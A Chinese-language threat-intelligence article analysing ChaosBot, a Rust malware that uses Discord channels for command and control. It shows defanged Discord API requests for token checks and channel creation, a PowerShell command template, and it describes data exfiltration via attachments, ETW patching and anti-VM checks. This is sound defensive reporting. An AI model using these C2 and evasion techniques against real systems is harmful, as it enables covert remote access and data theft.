网络安全领域出现了一种复杂的新型威胁,它利用流行的通信平台Discord进行隐蔽操作。
ChaosBot是一种基于Rust的恶意软件变种,它通过将恶意命令与控制流量隐藏在合法云服务通信中,代表了对抗战术的新演进。
这种方法使攻击者能够与正常网络流量无缝融合,极大增加了传统安全解决方案的检测难度。
恶意软件通过精心设计的感染链运作,初始阶段要么利用泄露的VPN凭证,要么通过包含恶意Windows快捷文件的钓鱼攻击。
执行后,ChaosBot通过验证其Discord机器人令牌并创建以受害者计算机命名的专用私人频道来建立持久访问。
该频道成为交互式命令 shell,攻击者可在此发布shell、download和scr(截图)等命令,结果通过Discord API以附件形式回传外渗。
Picussecurity研究人员发现,该恶意软件具备复杂的规避能力,包括修补Windows事件跟踪(ETW)函数以蒙蔽端点检测系统,以及针对VMware和VirtualBox环境的已知MAC地址前缀执行反虚拟化检查。
这些技术表明,攻击者刻意规避沙箱安全研究环境中的分析。
基于Discord的命令与控制基础设施
ChaosBot的技术实现揭示了一个完全基于Discord API基础设施构建的精心设计的C2协议。
该恶意软件用Rust编写,并利用reqwest或serenity库,通过看起来与合法Discord流量完全相同的标准HTTPS请求维持通信。
初始执行时,ChaosBot通过向hxxps://discord[.]com/api/v10/users/@me发送GET请求验证其嵌入的机器人令牌。
认证成功后,它通过POST请求创建受害者专用频道:
POST hxxps://discord[.]com/api/v10/guilds/<THREAT_ACTOR_GUILD_ID>/channels
{"name":"<VICTIM_COMPUTER_NAME>","type":0} 命令执行依赖于持续轮询机制,检查受害者频道中的新消息。
当操作者发布shell命令时,ChaosBot通过PowerShell强制UTF8编码:powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; <SOME_COMMAND>"。
命令输出、截图或下载的文件随后作为multipart/form-data附件上传回Discord,通过大多数企业防火墙和安全设备信任的平台创建了完整功能的远程访问能力。
发表评论
您还未登录,请先登录。
登录